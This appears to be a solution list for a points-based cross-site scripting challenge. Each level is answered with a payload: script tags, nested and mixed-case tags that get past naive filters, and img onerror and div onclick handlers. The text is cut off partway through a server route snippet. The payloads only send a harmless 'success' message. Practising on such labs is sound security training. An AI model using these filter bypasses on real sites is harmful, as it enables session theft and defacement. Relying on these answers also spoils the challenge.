Please credit the source when reposting:
0. Welcome
N/A
1. A Truly Disruptive Startup (3 points)
<script>window.postMessage('success', '*')</script>
2. No Script Allowed (3 points)
<scripscriptt>window.postMessage('success', '*')</scripscriptt>
3. One More Time, Like You Mean It (3 points)
<scripscriptt>window.postMessage('success', '*')</scripscriptt>
4. An Open-and-Shut Case (3 points)
<ScRiPt>window.postMessage('success', '*')</ScRiPt>
5. Time to Mix Things Up (3 points)
<ScRiPt>window.postMessage('success', '*')</ScRiPt>
6. A Picture is Worth a Thousand Words (3 points)
<img src onerror="window.postMessage('success', '*')">
7. Between a Rock And a Hard Place (3 points)
<div onclick="window.postMessage('success', '*')">
8. Angle of Death (6 points)
Attack input:
<><script>window.postMessage('success', '*')</script>
Server code:
router.get('/search', async (req, res) =>